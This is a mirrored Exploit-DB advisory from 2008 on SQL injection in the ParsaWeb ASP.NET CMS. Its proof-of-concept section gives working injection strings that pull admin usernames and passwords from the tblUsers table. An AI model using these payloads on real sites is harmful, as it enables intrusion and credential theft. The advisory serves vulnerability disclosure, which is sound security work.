bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/asp/webapps/6610.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

53 lines
No EOL
1.5 KiB
Text
Raw Permalink Blame History

########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: ParsaWeb CMS SQL Injection
# Vendor: http://www.parsagostar.com
# Demo: http://cms.parsagostar.com/
# Exploit: Available
# Impact: High
# Fix: N/A
# Original advisory: http://www.bugreport.ir/index_53.htm
###################################################################################
####################
1. Description:
####################
ParsaWeb is a commercial ASP.NET website and content management system.
####################
2. Vulnerabilities:
####################
Input passed to the "id" parameter in default.aspx and txtSearch in search section are not properly sanitised before being used in SQL queries.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
####################
3. Exploits/POCs:
####################
http://www.example.com/?page=page&id=-164 or 1=(select top 1 user_pass from tblUsers where user_name = 'admin')
http://www.example.com/?page=Search
Search:AmnPardaz%') union ALL select '1',user_name+':'+user_pass,'3','4','5','6','7','8','9','10',11 from tblUsers--
####################
4. Solution:
####################
Edit the source code to ensure that inputs are properly sanitized.
####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
# milw0rm.com [2008-09-28]
Reference in a new issue View git blame Copy permalink